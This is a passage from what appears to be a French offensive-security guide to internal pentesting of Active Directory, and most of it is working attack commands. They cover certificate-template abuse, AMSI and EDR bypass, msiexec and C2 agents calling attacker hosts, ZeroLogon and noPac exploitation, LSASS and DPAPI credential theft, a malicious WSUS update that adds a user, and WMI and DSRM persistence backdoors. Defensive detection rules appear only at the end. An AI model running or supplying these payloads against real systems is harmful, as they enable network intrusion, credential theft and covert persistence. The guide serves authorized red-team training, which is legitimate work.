ESC9No security extensionmsPKI-Enrollment-FlagShadow credentialsMoyen

Exploitation ESC1

# ESC1 : demande de certificat avec SAN administrateur
certipy req -u user@domain.local -p Password123 \
  -ca 'CA-SERVER\CA-NAME' \
  -template VulnerableTemplate \
  -upn administrator@domain.local \
  -dc-ip 192.168.1.10

# Authentification Kerberos avec le certificat obtenu
certipy auth -pfx administrator.pfx -dc-ip 192.168.1.10

# Résultat : NT hash de l'administrateur + TGT
À retenir : ESC1 est la vulnérabilité ADCS la plus répandue et la plus simple à exploiter. Dans nos missions de pentest 2024-2025, plus de 60% des environnements AD avec ADCS déployé présentaient au moins un template ESC1 ou ESC4 exploitable.

14. Living-off-the-Land et bypass EDR

Le concept de Living-off-the-Land (LotL) désigne l'utilisation exclusive des outils légitimes présents sur le système cible pour réaliser des opérations offensives. Cette approche, popularisée par les groupes APT étatiques comme Volt Typhoon, rend la détection basée sur les signatures totalement inefficace. En 2026, les EDR modernes ont amélioré leur détection comportementale — mais des combinaisons LotL sophistiquées restent difficiles à distinguer d'une activité légitime.

Pour le guide complet LOLBAS, consultez LOLBAS/LOLBins : guide complet Living-off-the-Land.

# Reconnaissance LotL via PowerShell natif
# Enumération AD sans outil tiers
[System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
([adsisearcher]"(objectClass=computer)").FindAll()

# Récupération SPNs sans outil
setspn -T domain.local -Q */*

# Exécution distante via msiexec (LOLBin)
msiexec /q /i http://attacker/payload.msi

# Exécution via wscript (signature non vérifiée)
wscript.exe //E:JScript payload.js

# Bypass AMSI classique 2025
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
À retenir : Le groupe Volt Typhoon (APT étatique chinois) a conduit des campagnes d'intrusion dans des infrastructures critiques américaines utilisant exclusivement des outils LotL pendant plus de 5 ans, non détectés. Cette approche est désormais la norme pour les Red Teams de niveau avancé.

Pour les techniques d'évasion EDR avancées, consultez EDR Bypass 2026 : techniques et contre-mesures.

15. Pivoting et tunnels

Le pivoting désigne la technique consistant à utiliser un système compromis comme relais pour accéder à des segments réseau inaccessibles directement depuis la machine de l'attaquant. En réseau d'entreprise segmenté, le pivoting est indispensable pour atteindre les zones protégées (VLAN production, réseau OT, DMZ interne).

ligolo-ng : le standard 2025-2026

ligolo-ng est devenu en 2024-2026 l'outil de pivoting de référence pour les Red Teams. Il crée un tunnel TLS transparent, sans besoin de proxychains, en routant directement le trafic via une interface tun. Contrairement à Chisel, il ne nécessite pas de modifier proxychains.conf pour chaque outil.

# Serveur ligolo-ng sur la machine attaquante
./proxy -selfcert -laddr 0.0.0.0:11601

# Agent déployé sur la machine pivot (Windows)
.\agent.exe -connect attacker_ip:11601 -ignore-cert

# Agent sur Linux pivot
./agent -connect attacker_ip:11601 -ignore-cert

# Dans la console ligolo-ng :
session          # Sélectionner la session
start            # Démarrer le tunnel
ifconfig         # Voir les interfaces distantes

# Ajouter une route vers le réseau distant (Linux)
sudo ip route add 192.168.2.0/24 dev ligolo
# Chisel : alternative légère
# Serveur
chisel server --reverse --port 8080

# Client (depuis machine pivot)
chisel client attacker_ip:8080 R:socks

# Configuration proxychains
echo "socks5 127.0.0.1 1080" >> /etc/proxychains4.conf
proxychains nxc smb 192.168.2.0/24 -u user -p Password123

# SSH dynamic forwarding (si SSH disponible sur pivot)
ssh -D 1080 -N -f user@pivot_ip
proxychains nmap -sT -p 445,88,389 192.168.2.0/24

16. Exploitation des partages réseau

Les partages réseau SMB sont une mine d'informations en pentest interne. Scripts PowerShell avec mots de passe en dur, fichiers de configuration, sauvegardes non chiffrées, clés SSH — les partages IT et ADMIN$ regorgent de credentials permettant d'accélérer considérablement la compromission.

# Énumération SMB avec NetExec
nxc smb 192.168.1.0/24 -u user -p Password123 --shares
nxc smb 192.168.1.0/24 -u user -p Password123 --shares --filter-shares READ WRITE

# Spider des partages (recherche de fichiers sensibles)
nxc smb 192.168.1.20 -u user -p Password123 -M spider_plus \
  -o READ_ONLY=false EXCLUDE_FILTER=".jpg,.png,.gif,.bmp"

# smbmap : énumération et accès
smbmap -H 192.168.1.20 -u user -p Password123 -R SYSVOL --depth 5

# Recherche de fichiers sensibles dans les partages
smbclient //192.168.1.20/IT -U 'domain.local\user%Password123' \
  -c "prompt OFF; recurse ON; mget *"

# Recherche de patterns credential dans les fichiers
grep -r "password\|passwd\|credential\|secret\|apikey" /tmp/shares/ \
  --include="*.txt,*.xml,*.ps1,*.bat,*.conf,*.ini" -l
EmplacementFichiers typiquesInformation trouvée
\\DC\SYSVOL\GPO XML, scriptsMots de passe GPP (cpassword)
\\server\IT\Scripts PS, READMECredentials services
\\server\Backup\Archives, dumpsHashes, configs DB
\\server\Software\Installeurs, configsLicense keys, API tokens
C$\ProgramData\Configs appliConnexions DB, LDAP
À retenir : Les GPO Preferences (GPP) créées avant 2014 stockaient les mots de passe chiffrés avec une clé AES publiée par Microsoft. Bien que patché, de nombreux environnements maintiennent encore des fichiers Groups.xml avec des "cpassword" déchiffrables instantanément via gpp-decrypt.

17. Attaques sur services applicatifs internes

MSSQL : xp_cmdshell et chaînes de serveurs liés

Microsoft SQL Server est une cible de choix en pentest interne. Sa fonctionnalité xp_cmdshell permet l'exécution de commandes OS depuis le contexte SQL. Les Linked Servers permettent de rebondir d'un serveur SQL à l'autre, parfois jusqu'à des serveurs avec des droits élevés.

# Découverte MSSQL avec NetExec
nxc mssql 192.168.1.0/24 -u user -p Password123

# Connexion et exécution via mssqlclient.py
mssqlclient.py domain.local/sa:Password123@192.168.1.30 -windows-auth

# Dans mssqlclient.py :
SQL> enable_xp_cmdshell
SQL> xp_cmdshell whoami
SQL> xp_cmdshell "powershell -enc BASE64"

# Énumération linked servers
SQL> SELECT name, product, provider FROM sys.servers WHERE is_linked = 1
SQL> EXEC ('SELECT @@version') AT [linked_server]
SQL> EXEC ('EXEC xp_cmdshell ''whoami''') AT [linked_server]

WSUS exploitation

Un serveur Windows Server Update Services (WSUS) mal configuré permet d'injecter de fausses mises à jour Windows sur les postes clients. PyWSUS automatise cette attaque qui nécessite un accès Man-in-the-Middle sur le trafic WSUS HTTP.

# PyWSUS : injection de mise à jour malveillante
python3 pywsus.py -H 192.168.1.100 -p 8530 \
  -e /path/to/PsExec.exe \
  -c "PsExec.exe -accepteula -s cmd.exe /c net user hacker P@ssw0rd /add"

# La cible doit communiquer en HTTP (non HTTPS) avec ce WSUS
# Nécessite une position MITM ou une redirection DNS

PrintNightmare et exploits Windows récents

CVENomServiceImpactStatut 2026
CVE-2021-34527PrintNightmarePrint SpoolerLPE/RCEPatché mais variantes
CVE-2021-36942PetitPotamMS-EFSRCoercitionPartiellement patché
CVE-2022-26923CertifriedADCSLPE → DAPatché (juillet 2022)
CVE-2023-23397Outlook NTLM leakOutlookHash capturePatché, variantes actives
CVE-2024-26229Windows CSCCSC driverLPE SYSTEMPatché mars 2024
CVE-2024-38094SharePoint RCESharePointRCEPatché juillet 2024

18. Attaques sans authentification préalable

Certaines techniques permettent d'obtenir un accès privilégié sans aucune credential de domaine. Bien que la plupart des vulnérabilités historiques soient patchées, leurs variants et les mauvaises configurations persistent dans de nombreux environnements non maintenus.

ZeroLogon (CVE-2020-1472) en 2026

ZeroLogon exploite une faiblesse cryptographique dans le protocole Netlogon permettant à un attaquant non authentifié de réinitialiser le mot de passe machine d'un DC à une valeur nulle. En 2026, les systèmes non patchés sont rares mais existent encore dans des environnements OT/legacy.

# Test ZeroLogon (ne pas exploiter en production sans autorisation explicite)
python3 zerologon_tester.py DC01 192.168.1.10

# Exploitation (DESTRUCTIF - réinitialise le mot de passe DC)
python3 cve-2020-1472-exploit.py DC01 192.168.1.10

# Récupération des hashes après exploitation
secretsdump.py -no-pass -just-dc DOMAIN/DC01\$@192.168.1.10

# RESTAURATION IMPÉRATIVE après test
# Utiliser le hash original récupéré pour restaurer
secretsdump.py DOMAIN/Administrator@192.168.1.10 -hashes :ADMIN_HASH
À retenir : ZeroLogon est DESTRUCTIF si mal utilisé — il réinitialise le hash machine du DC, ce qui peut casser la réplication AD. N'exploitez jamais cette vulnérabilité sans autorisation explicite dans les RoE et sans plan de restauration prévu. En test : utilisez uniquement le tester (vérification sans exploitation).

noPac (CVE-2021-42278 / CVE-2021-42287)

noPac combine deux vulnérabilités permettant à un utilisateur de domaine standard d'obtenir un ticket de service DC$ impersonant n'importe quel utilisateur, y compris Administrator. En 2026, l'exploitation nécessite que les deux CVE ne soient pas patchées simultanément.

# noPac.py exploitation
python3 noPac.py domain.local/user:Password123 -dc-ip 192.168.1.10 -shell
python3 noPac.py domain.local/user:Password123 -dc-ip 192.168.1.10 --impersonate Administrator

19. PetitPotam et coercition forcée

PetitPotam exploite le protocole MS-EFSR (Encrypting File System Remote Protocol) pour forcer un serveur Windows à s'authentifier vers une cible arbitraire. La version non authentifiée (CVE-2021-36942) a été partiellement patchée par Microsoft en août 2021, mais de nombreuses variantes authentifiées restent fonctionnelles en 2026.

# PetitPotam authentifié (post-patch)
python3 PetitPotam.py -u user -p Password123 -d domain.local \
  attacker_ip dc01.domain.local

# Coercer.py : test exhaustif de tous les protocoles de coercition
coercer scan -u user -p Password123 -d domain.local \
  --target-ip 192.168.1.10 --listener-ip attacker_ip

# Méthodes testées par Coercer :
# MS-EFSR (EfsRpcOpenFileRaw, EfsRpcEncryptFileSrv, ...)
# MS-DFSNM (NetrDfsAddStdRoot, NetrDfsRemoveStdRoot)
# MS-FSRVP (IsPathShadowCopied)
# MS-RPRN (RpcRemoteFindFirstPrinterChangeNotification)
# MS-PAR (RpcAsyncOpenPrinter)
MéthodeProtocoleAuth requisePatchéeVariantes 2026
PetitPotamMS-EFSRNon (originale) / Oui (post-patch)Partielle10+ variantes
PrinterBugMS-RPRNOuiNonToujours active
DFSCoerceMS-DFSNMOuiNonActive
ShadowCoerceMS-FSRVPOuiNonActive si VSS actif
À retenir : La coercition n'est pas une vulnérabilité en soi — c'est un comportement by-design de protocoles Windows. Microsoft a refusé de patcher PrinterBug car "not a security vulnerability". La seule défense est de désactiver le service Print Spooler sur les DC, ce qui casse l'impression depuis les DCs (peu d'impact en production).

20. ESC1-ESC15 : guide pratique des Certificate Services

La taxonomie complète des vulnérabilités ADCS compte en 2026 quinze classes (ESC1-ESC15), chacune correspondant à une mauvaise configuration ou à un abus de fonctionnalité des Certificate Services. Voici un guide pratique des plus impactantes.

ESCCondition de vulnérabilitéCommande CertipyImpact maximal
ESC1ENROLLEE_SUPPLIES_SUBJECT + low-priv enrollcertipy req -upn admin@domainImpersonate DA
ESC2Any Purpose EKU ou EKU videIdem ESC1Impersonate DA
ESC3Certificate Request Agentcertipy req -on-behalf-ofDemander certs pour d'autres
ESC4Write ACL sur templateModifier → ESC1Impersonate DA
ESC6EDITF_ATTRIBUTESUBJECTALTNAME2certipy req -upn admin@domainImpersonate DA
ESC7ManageCA ou ManageCertificates ACLcertipy ca -enable-templateActiver templates dangereux
ESC8Web Enrollment HTTP (sans HTTPS)ntlmrelayx → certipyCert via NTLM relay
ESC11IF_ENFORCEENCRYPTICERTREQUESTNTLM relay en clairCert via relay non chiffré
ESC13OID Group Linkcertipy req avec OIDAjout à groupe via cert
# Workflow complet ESC4 → ESC1
# 1. Modifier le template pour ajouter ENROLLEE_SUPPLIES_SUBJECT
certipy template -u user@domain.local -p Password123 \
  -template VulnerableTemplate -save-old

# 2. Exploiter comme ESC1
certipy req -u user@domain.local -p Password123 \
  -ca 'CA\CA-NAME' -template VulnerableTemplate \
  -upn administrator@domain.local

# 3. Authentification
certipy auth -pfx administrator.pfx -dc-ip 192.168.1.10

# 4. Restaurer le template (bonne pratique pentest)
certipy template -u user@domain.local -p Password123 \
  -template VulnerableTemplate -configuration saved_template.json

21. Active Directory dans Azure (Hybrid)

En 2026, la majorité des organisations ont adopté une architecture hybride : Active Directory on-premises synchronisé avec Microsoft Entra ID (anciennement Azure AD) via Azure AD Connect. Cette hybridation crée des chemins d'attaque traversant les frontières cloud/on-prem, particulièrement exploités par des groupes comme Storm-0558 (attaque de Microsoft en 2023) et Cozy Bear/APT29.

Compromission d'Azure AD Connect

Le serveur Azure AD Connect stocke les credentials de synchronisation — notamment le compte MSOL_XXXXXXXX avec des droits de réplication sur l'AD local. Sa compromission équivaut à un DCSync sans droits DA explicites.

# Extraction des credentials Azure AD Connect (nécessite admin local sur le serveur)
# Module AADInternals
Import-Module AADInternals
Get-AADIntSyncCredentials

# Alternative : décryptage manuel depuis la DB locale
# Les credentials sont stockés dans la DB SQL locale de AAD Connect
# HKLM\SOFTWARE\Microsoft\AD Sync\Parameters

# Depuis les credentials MSOL extraits, DCSync sans droits DA explicites
secretsdump.py -just-dc domain.local/MSOL_ACCOUNT:PASSWORD@dc01.domain.local

Pass-Through Authentication abuse

# Extraction des hashes via PTA agent compromis
# Le serveur PTA valide les authentifications on-prem pour Azure
# Un agent PTA compromis peut logger tous les mots de passe en clair

# AADInternals : installer un PTA agent malveillant
Import-Module AADInternals
Install-AADIntPTASpy
À retenir : Dans un environnement hybride, compromettez toujours le serveur Azure AD Connect en priorité. Il dispose de droits de réplication AD (équivalent DCSync) et d'un accès aux credentials Entra ID — un double pivot on-prem/cloud en une seule machine.

22. WiFi et accès réseau

Les tests WiFi en pentest interne révèlent souvent des vulnérabilités critiques permettant à un attaquant sans fil d'accéder directement au réseau interne. En 2026, WPA3 se déploie progressivement mais WPA2-Enterprise reste dominant — avec ses propres vecteurs d'attaque.

ProtocoleAttaque principaleOutilComplexitéEfficacité 2026
WPA2-PSKHandshake capture + crackingaircrack-ng, hashcatFaibleÉlevée si PSK faible
WPA2-Enterprise PEAPEvil Twin + capture credshostapd-wpe, eaphammerMoyenTrès élevée
WPA2-Enterprise EAP-TLSCertificat frauduleuxHostapd + CA fakeÉlevéFaible (validation cert)
WPA3-SAEDragonblood variantsDragonslayerTrès élevéFaible (patchée)
802.1X filaireVLAN hopping, MAB bypassmacchangerMoyenÉlevée si MAB
# WPA2-Enterprise PEAP : Evil Twin avec eaphammer
# Récupération des credentials utilisateurs en clair

# 1. Créer un AP jumeau (même SSID, signal plus fort)
./eaphammer -i wlan0 --channel 6 --auth wpa-eap \
  --essid "CorpWiFi" --creds --negotiate balanced

# 2. Les clients Windows se connectent automatiquement
# et envoient leurs credentials NTLM (MSCHAPv2)
# eaphammer les affiche en clair ou sous forme crackable

# Capture handshake WPA2-PSK
airmon-ng start wlan0
airodump-ng -c 6 --bssid TARGET_BSSID -w capture wlan0mon
aireplay-ng -0 5 -a TARGET_BSSID wlan0mon  # deauth
hashcat -m 22000 capture.hccapx wordlist.txt

23. Linux dans le réseau Windows

Les systèmes Linux intégrés dans un domaine Windows via SSSD ou realmd sont souvent les cibles les plus négligées du pentest interne. Ils héritent des mécanismes Kerberos AD mais avec des configurations parfois plus laxistes qu'un poste Windows managé par GPO.

# Énumération Linux joint au domaine
# Tickets Kerberos stockés en clair sur le filesystem
ls -la /tmp/krb5cc_*
klist -l

# Extraction et utilisation des tickets
export KRB5CCNAME=/tmp/krb5cc_1000
klist
# Utilisation directe avec Impacket
secretsdump.py -k -no-pass dc01.domain.local

# LinPEAS pour privilege escalation Linux
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh

# SUID binaries exploitation
find / -perm -4000 -type f 2>/dev/null
# GTFOBins pour exploitation
# https://gtfobins.github.io/

# Sudo misconfiguration
sudo -l  # lister les droits sudo
# Si "NOPASSWD: /usr/bin/find" → escalade triviale
sudo find . -exec /bin/sh \; -quit

Pour les techniques complètes d'élévation de privilèges Linux, consultez Élévation de privilèges Linux : SUID et kernel exploits.

À retenir : Les tickets Kerberos Linux stockés dans /tmp/krb5cc_* sont directement utilisables avec les outils Impacket via la variable KRB5CCNAME. Un accès root sur un serveur Linux joint au domaine permet souvent d'obtenir des tickets de service de haute valeur sans interaction avec le DC.

24. C2 frameworks en pentest interne

Les Command & Control (C2) frameworks permettent de gérer des agents déployés sur les systèmes compromis. En pentest interne 2026, le choix du C2 impacte directement la détectabilité et la capacité à contourner les EDR.

FrameworkLicenceLangage agentÉvasion EDRCas d'usage
Cobalt StrikeCommerciale (~3500$/an)Beacon (C)Excellente (malleable)Red Team avancé
SliverOpen sourceGoBonnePentest, Red Team
MythicOpen sourceMultiple (plugins)VariableRecherche, custom
Brute Ratel C4Commerciale (~2500$/an)C++Très bonneRed Team, APT sim
HavocOpen sourceC/C++BonneAlternative CS
# Sliver : démarrage et configuration
sliver-server

# Dans Sliver console :
generate --mtls attacker_ip:443 --os windows --arch amd64 --save agent.exe
generate --http attacker_ip:80 --os linux --arch amd64 --save agent_linux

# Listeners
mtls --lport 443
http --lport 80
dns --domains c2.attacker.com

# Sessions
sessions
use SESSION_ID
shell
execute-assembly SharpHound.exe -c All
# Cobalt Strike : Malleable C2 Profile (discrétion)
# Exemple de profil imitant le trafic OneDrive

set useragent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36";
set sleeptime "45000";  # 45 secondes entre check-ins
set jitter "20";        # ±20% variation

http-get {
  set uri "/onedrive/sync/status";
  client { header "Accept" "application/json"; }
}

http-post {
  set uri "/onedrive/sync/upload";
  client { header "Content-Type" "application/octet-stream"; }
}

25. Évasion AV/EDR moderne

L'évasion des Endpoint Detection and Response (EDR) est en 2026 la compétence la plus demandée en Red Team. Les EDR modernes ne se basent plus sur les signatures mais sur l'analyse comportementale, la télémétrie kernel, et l'intelligence artificielle. Les techniques d'évasion évoluent en permanence dans une course aux armements entre attaquants et défenseurs.

Pour une analyse complète, consultez notre guide EDR Bypass 2026 : techniques et contre-mesures.

Direct Syscalls : Hell's Gate et Halo's Gate

Les direct syscalls contournent les hooks userland des EDR en appelant directement les syscalls Windows NT sans passer par ntdll.dll (que l'EDR hooké). Hell's Gate résout dynamiquement les numéros de syscall depuis ntdll. Halo's Gate gère le cas où ntdll elle-même est hookée.

# Exemple conceptuel Direct Syscall (C)
# Les numéros de syscall varient par version Windows
# NtAllocateVirtualMemory = 0x18 (Win10 22H2)
# NtWriteVirtualMemory = 0x3A
# NtCreateThreadEx = 0xC1
# NtProtectVirtualMemory = 0x50

# Bypass AMSI + ETW patching (PowerShell, 2026)
$a = [Ref].Assembly.GetTypes()
foreach ($b in $a) {
  if ($b.Name -like "*iUtils") {
    $c = $b.GetFields('NonPublic,Static')
    foreach ($d in $c) {
      if ($d.Name -like "*Context") { $d.SetValue($null,[IntPtr]1) }
    }
  }
}

# Module stomping : charger un module légitime puis écraser son code
# Technique populaire pour masquer l'injection de shellcode
À retenir : Les Direct Syscalls sont efficaces contre les hooks userland mais pas contre la télémétrie kernel (ETW-TI, Kernel Callback). En 2026, les EDR de niveau enterprise (CrowdStrike, SentinelOne) utilisent des drivers kernel qui observent les syscalls indépendamment des hooks userland.

Process Unhooking

# Unhooking ntdll.dll : remplacer la version hookée par une copie propre du disque
# Concept : lire ntdll.dll depuis C:\Windows\System32\, mapper les sections .text
# propres par-dessus la version en mémoire du processus courant

# Outil : Freshycalls, SysWhispers3
# Ces techniques sont détectées par les EDR qui surveillent les lectures de ntdll sur disque

26. Récolte de credentials post-exploitation

La phase de récolte de credentials post-exploitation est cruciale pour approfondir la compromission. En 2026, avec Credential Guard et RunAsPPL activés sur les postes récents, le dump LSASS classique (mimikatz sekurlsa::logonpasswords) ne fonctionne plus directement — mais des techniques alternatives persistent.

LSASS dump : techniques modernes

# Méthode 1 : MiniDump via comsvcs.dll (LOLBin)
# Nécessite SeDebugPrivilege
$id = (Get-Process lsass).Id
rundll32 C:\Windows\System32\comsvcs.dll, MiniDump $id C:\Temp\lsass.dmp full

# Méthode 2 : NanoDump (contourne PPL, chiffré)
# nanodump.exe --write C:\Temp\lsass.dmp --valid

# Méthode 3 : Task Manager (GUI) pour créer dump
# Nécessite session interactive ou RDP

# Méthode 4 : ProcessDump via WER
# reg add "HKLM\SOFTWARE\Microsoft\Windows\Windows Error Reporting\LocalDumps" /v DumpType /t REG_DWORD /d 2

# Analyse offline depuis Kali
pypykatz lsa minidump lsass.dmp
# Extraction hashes NT, tickets Kerberos, mots de passe en clair (si WDigest actif)

DPAPI : décryptage hors-ligne

DPAPI (Data Protection API) protège de nombreux secrets Windows : mots de passe navigateurs (Chrome, Edge), credentials WiFi, certificats, clés SSH de Putty, jetons Azure CLI. Son exploitation hors-ligne nécessite le masterkey et les clés de domaine.

# Dump DPAPI master keys et blobs
# Depuis un DC compromis
dpapi.py backupkeys --export -t domain.local/Administrator:Password123@dc01.domain.local

# Déchiffrement hors-ligne avec la backupkey du domaine
dpapi.py masterkey -file masterkey -pvk domain_backup.pvk
dpapi.py credential -file CREDENTIAL_FILE -key MASTERKEY
dpapi.py blob -f BLOB_FILE -key MASTERKEY

# Chrome passwords via DPAPI
# Les passwords Chrome sont chiffrés avec DPAPI (user context)
# Exécuter depuis la session de l'utilisateur cible
python3 decrypt_chrome.py --browser chrome

27. Reconnaissance interne offensive

Une fois un accès établi et des credentials récoltés, la phase de reconnaissance interne offensive vise à identifier tous les actifs à haute valeur avant de lancer les attaques de mouvement latéral avancé.

# Scanning interne via SOCKS pivot
proxychains nmap -sT -p 445,88,389,3389,5985 192.168.2.0/24 --open

# Enumération AD complète via LDAP
ldapsearch -H ldap://dc01.domain.local -x -D "user@domain.local" \
  -w Password123 -b "DC=domain,DC=local" "(objectClass=user)" \
  sAMAccountName memberOf pwdLastSet

# Credential reuse hunting : tester les credentials récoltés sur tous les systèmes
nxc smb targets.txt -u found_user -p found_password
nxc winrm targets.txt -u found_user -p found_password
nxc mssql targets.txt -u found_user -p found_password
nxc ssh targets.txt -u found_user -p found_password

28. Techniques de persistance avancées

La persistance avancée vise à survivre aux redémarrages, rotations de mots de passe, et interventions du SOC. En 2026, les techniques les plus discrètes exploitent des mécanismes Windows légitimes rarement surveillés.

TechniqueMécanismeSurvie rebootDétectionNiveau OPSEC
Scheduled TaskTask SchedulerOuiMoyen (logs 4698)Moyen
WMI SubscriptionWMI event consumerOuiFaible (peu surveillé)Élevé
COM hijackingHKCU registryOuiFaibleÉlevé
DLL hijackingSearch order abuseOuiMoyenÉlevé
Run keysHKCU\Software\Microsoft\Windows\CurrentVersion\RunOui (user)ÉlevéFaible
DSRM passwordAD DSRM accountOui (AD)Très faibleTrès élevé
AdminSDHolderACL SD propagationOui (AD)FaibleTrès élevé
# WMI Event Subscription (persistance discrète)
# EventFilter : déclencheur (ex: toutes les 60 secondes)
$Filter = Set-WmiInstance -Namespace "root\subscription" -Class "__EventFilter" -Arguments @{
  Name = "Updater"
  EventNamespace = "root\cimv2"
  QueryLanguage = "WQL"
  Query = "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"
}

# EventConsumer : action à exécuter
$Consumer = Set-WmiInstance -Namespace "root\subscription" -Class "CommandLineEventConsumer" -Arguments @{
  Name = "Updater"
  CommandLineTemplate = "powershell.exe -enc BASE64PAYLOAD"
}

# Binding
Set-WmiInstance -Namespace "root\subscription" -Class "__FilterToConsumerBinding" -Arguments @{
  Filter = $Filter
  Consumer = $Consumer
}

# DSRM password backdoor (nécessite DA)
# Activer le login DSRM via réseau (désactivé par défaut)
New-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa" -Name "DsrmAdminLogonBehavior" -Value 2 -PropertyType DWORD -Force
# Réinitialiser le mot de passe DSRM
ntdsutil "SET DSRM PASSWORD" "RESET PASSWORD ON SERVER dc01.domain.local" q q

29. Bypass des protections Microsoft modernes

Microsoft a considérablement renforcé la sécurité Windows entre 2022 et 2026 avec plusieurs technologies qui complexifient les attaques classiques. Comprendre ces protections — et leurs limites — est indispensable pour un Red Teamer en 2026.

Credential Guard et VBS

Credential Guard utilise la Virtualization-Based Security (VBS) pour isoler les secrets LSASS dans une enclave Hyper-V séparée, inaccessible même au kernel Windows. Depuis Windows 11 22H2, il est activé par défaut sur les machines compatibles. Impact direct : sekurlsa::logonpasswords ne retourne plus de mots de passe en clair ni de hashes NT.

# Vérification Credential Guard
Get-ComputerInfo | Select-Object -Property DeviceGuard*

# Contournements partiels en 2026 :
# 1. Les hashes Kerberos (TGT) restent accessibles même avec CG
# 2. Les hashes NTLM NTLMv1/v2 en transit restent capturables (réseau)
# 3. DPAPI secrets non protégés par CG

# Désactivation CG si droits DA (rare mais documenté)
# Via BIOS/UEFI ou GPO
reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v EnableVirtualizationBasedSecurity /t REG_DWORD /d 0 /f

LSA Protection (RunAsPPL)

# Vérification PPL
Get-ItemPropertyValue -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa" -Name RunAsPPL

# Bypass PPL avec driver vulnérable (Bring Your Own Vulnerable Driver - BYOVD)
# PPLdump, PPLKiller, EDRSandBlast
# Ces outils chargent un driver signé vulnérable pour escalader vers kernel
# et désactiver la protection PPL

# BYOVD est une technique APT documentée (Storm-0950, FIN7, etc.)
# Détection : surveillance du chargement de drivers non approuvés

Microsoft Defender for Identity (MDI) evasion

Détection MDITechnique détectéeContournement
Recon via LDAPEnumération massive LDAPRequêtes lentes, ciblées
Skeleton KeyPatch LSASS sur DCDifficile à contourner
DCSyncDS-Replication depuis non-DCDepuis DC compromis
Pass-the-HashNTLM depuis source inhabituelleSource légitime, horaires normaux
KerberoastingVolume anormal TGS-REPCiblé (1-2 comptes max)
Honey TokensUtilisation de comptes leurresIdentification préalable via BloodHound
À retenir : Microsoft Defender for Identity analyse le trafic réseau directement depuis les DC via un agent installé — il ne peut pas être contourné par de l'évasion userland. La seule contre-mesure efficace est de ralentir les opérations et de les mimer d'une activité légitime.

30. Reporting et livrables

Le rapport de pentest interne est le livrable principal de la mission. Sa qualité conditionne la capacité du client à remédier effectivement aux vulnérabilités identifiées et à prioriser ses investissements sécurité. Un rapport de pentest interne niveau expert comprend systématiquement plusieurs parties distinctes selon le public cible.

Structure d'un rapport pentest interne

SectionPublic cibleContenuLongueur typique
Executive SummaryCOMEX, RSSISynthèse risques, criticité globale, budget sécurité2-3 pages
Synthèse managérialeManagement ITFindings résumés, recommandations priorisées5-10 pages
Rapport techniqueÉquipe sécuritéDétail technique chaque finding30-80 pages
Plan de remédiationÉquipes ITActions concrètes, priorités, délais10-20 pages
AnnexesTechniqueLogs, captures, preuves d'exploitationVariable

Structure d'un finding technique

Chaque vulnérabilité documentée suit une structure standardisée : titre, identifiant unique (VULN-001), criticité CVSS v4.0, description technique, preuve d'exploitation (capture d'écran, log), impact business, recommandation de remédiation avec délai, et référence MITRE ATT&CK. La criticité est toujours contextualisée — une vulnérabilité théoriquement CVSS 9.8 mais nécessitant un accès physique est moins prioritaire qu'un Kerberoasting CVSS 6.0 permettant d'obtenir DA en 2 heures.

À retenir : Le rapport est ce que le client retient de la mission. Investissez autant de temps dans la rédaction que dans l'exploitation. Un finding sans preuve d'exploitation valide n'a aucune valeur. Chaque finding critique doit inclure une vidéo ou une séquence de captures démontrant l'impact réel.

31. Outils Red Team essentiels en 2026

PhaseOutilTypeLangueMaintenu
ReconBloodHound CEOpen sourceGo/ReactOui
ReconPingCastleFreewareC#Oui
ReconADReconOpen sourcePowerShellMoyen
PoisonResponderOpen sourcePythonOui
Poisonmitm6Open sourcePythonOui
Relayntlmrelayx (Impacket)Open sourcePythonOui
KerberosRubeusOpen sourceC#Oui
ADCSCertipyOpen sourcePythonOui
LatéralNetExec (nxc)Open sourcePythonOui
CoercitionCoercer.pyOpen sourcePythonOui
Pivotligolo-ngOpen sourceGoOui
C2SliverOpen sourceGoOui
Post-exploitMimikatzOpen sourceCMoyen
Post-exploitNanodumpOpen sourceCOui

32. Labs et environnements d'entraînement

La pratique régulière sur des environnements dédiés est indispensable pour maintenir les compétences Red Team. En 2026, plusieurs plateformes proposent des environnements Active Directory réalistes avec des vulnérabilités actuelles.

PlateformeTypeNiveauCoûtSpécialité AD
HackTheBoxEn ligneIntermédiaire/Expert14$/moisPro Labs (RastaLabs, etc.)
OffSec Proving GroundsEn ligneIntermédiaire19$/moisPG Practice
GOAD (GitHub)Local (Vagrant)ExpertGratuitMulti-domaines AD
BadBlood (GitHub)Local (script PS)Tous niveauxGratuitPopulation AD réaliste
DetectionLabLocal (Vagrant)Défense/OffenseGratuitAD + ELK + Sysmon
# Installation GOAD (Game of Active Directory) - Lab local complet
git clone https://github.com/Orange-Cyberdefense/GOAD.git
cd GOAD/ad/GOAD

# Prérequis : VirtualBox + Vagrant + Ansible
vagrant up  # Déploie 5 VMs Windows (2 forests, 3 domains)

# BadBlood : peupler un AD avec 2500 users, groupes, GPO, etc.
Import-Module .\BadBlood.ps1
Invoke-BadBlood -NonInteractive
À retenir : GOAD (Game of Active Directory) est le meilleur lab gratuit pour pratiquer les techniques AD avancées. Il simule un environnement multi-domaines avec Kerberoasting, AS-REP Roasting, trusts, délégations, et ADCS configurés intentionnellement vulnérables. Disponible sur GitHub Orange Cyberdefense.

33. Détection et contre-mesures côté défense

Un pentest interne de qualité ne se limite pas à exploiter — il doit aussi identifier les lacunes de détection et recommander des règles SIEM et des configurations défensives concrètes. Cette double posture offense/défense est la marque d'un professionnel Red Team mature.

Règles SIEM critiques à monitorer

Technique ATT&CKEvent ID WindowsRègle SigmaPriorité
Kerberoasting (T1558.003)4769 (TGS-REQ, RC4)win_security_kerberoastingCritique
AS-REP Roasting (T1558.004)4768 (preauth disabled)win_security_asrep_roastingCritique
DCSync (T1003.006)4662 (DS-Replication)win_security_dcsyncCritique
Pass-the-Hash (T1550.002)4624 type 3 + NTLMwin_security_pass_the_hashÉlevé
AdminSDHolder (T1484)5136 (DS modification)win_security_adminsdholderÉlevé
